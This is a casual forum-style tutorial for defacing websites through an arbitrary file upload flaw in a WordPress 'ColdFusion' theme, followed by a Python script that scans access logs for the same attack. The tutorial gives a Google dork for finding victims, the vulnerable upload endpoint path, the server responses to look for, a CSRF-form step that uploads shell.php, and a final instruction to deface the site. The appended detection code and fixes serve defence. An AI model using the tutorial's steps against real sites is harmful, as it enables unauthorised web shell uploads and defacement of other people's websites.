exploit wordpress arbitrary coldfusion file upload vulnerability

hey guys :v cakil here again :v
this time cakil is sharing a deface tutorial for the wp-ColdFusion arbitrary file upload

check it out guys :)
dork: inurl:/wp-content/themes/ColdFusion/
(expand on it yourself)
exploit : /wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php
1. enter the dork into Google
2. find a target
3. append the exploit path
example
http://localhost/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php
4. vulnerable?
{"status":"NOK", "ERR":"This file is incorect"}
(see image)
5. open the CSRF form: here, bro
6. save it with an .html extension
7. vulnerable?
{"status":"OK","imageID":"shellphp","imageName":"shell.php","html":"\n\t\n\t\t
(see image, bro)
8. access the file?
ctrl-u, bro
it will then look like this
http:\/\/localhost\/wp-content\/uploads\/settingsimages\/shell.php\
(see image)
9. then it's just a matter of defacing it kwkwkkw :v
easy, right :v ok that's all, thank you
suggestions or criticism welcome :)
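
From the defender's side, the steps above leave a recognizable trail in the web server access log: a request to upload_settings_image.php, a POST to it, then a request for a script under /wp-content/uploads/settingsimages/. The following is an added example, not part of the original post, that flags this sequence per client; the log lines, IP addresses and function names are constructed assumptions, only the two paths come from the post.

```python
import re
from collections import defaultdict

# Paths taken from the post; everything else (log lines, names) is constructed.
UPLOAD_ENDPOINT = "/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php"
UPLOAD_DIR = "/wp-content/uploads/settingsimages/"
# Extensions that should never be served from an image upload directory.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)
# Apache/nginx combined log format: ip - - [time] "METHOD path proto" status size ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php HTTP/1.1" 200 48 "-" "Mozilla/5.0"
203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "POST /wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php HTTP/1.1" 200 212 "-" "Mozilla/5.0"
203.0.113.7 - - [01/Jan/2024:10:00:15 +0000] "GET /wp-content/uploads/settingsimages/shell.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] "GET /wp-content/uploads/settingsimages/logo.png HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
198.51.100.4 - - [01/Jan/2024:10:02:00 +0000] "GET /wp-content/uploads/settingsimages/x.PHP?a=1 HTTP/1.1" 404 0 "-" "Mozilla/5.0"
"""

def classify(method, path, status):
    """Return a finding label for one request, or None if it is unremarkable."""
    bare = path.split("?", 1)[0]
    if bare == UPLOAD_ENDPOINT:
        return "upload_post" if method == "POST" else "endpoint_probe"
    if bare.startswith(UPLOAD_DIR) and SCRIPT_EXT.search(bare):
        # 2xx means the script exists on disk and the server answered for it.
        return "script_served" if status.startswith("2") else "script_requested"
    return None

def scan(log_text):
    """Group findings by client IP; flag clients that uploaded and then ran a script."""
    findings = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ip, method, path, status = m.groups()
        label = classify(method, path, status)
        if label:
            findings[ip].append(label)
    compromised = sorted(ip for ip, f in findings.items()
                         if "upload_post" in f and "script_served" in f)
    return dict(findings), compromised

if __name__ == "__main__":
    per_ip, likely = scan(SAMPLE_LOG)
    for ip, labels in per_ip.items():
        print(ip, labels)
    print("upload followed by script execution:", likely)
```

A hit on "script_served" means a script file already sits in the upload directory; removing the theme's uploadify endpoint and disabling PHP execution under wp-content/uploads closes the path the post relies on.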
 

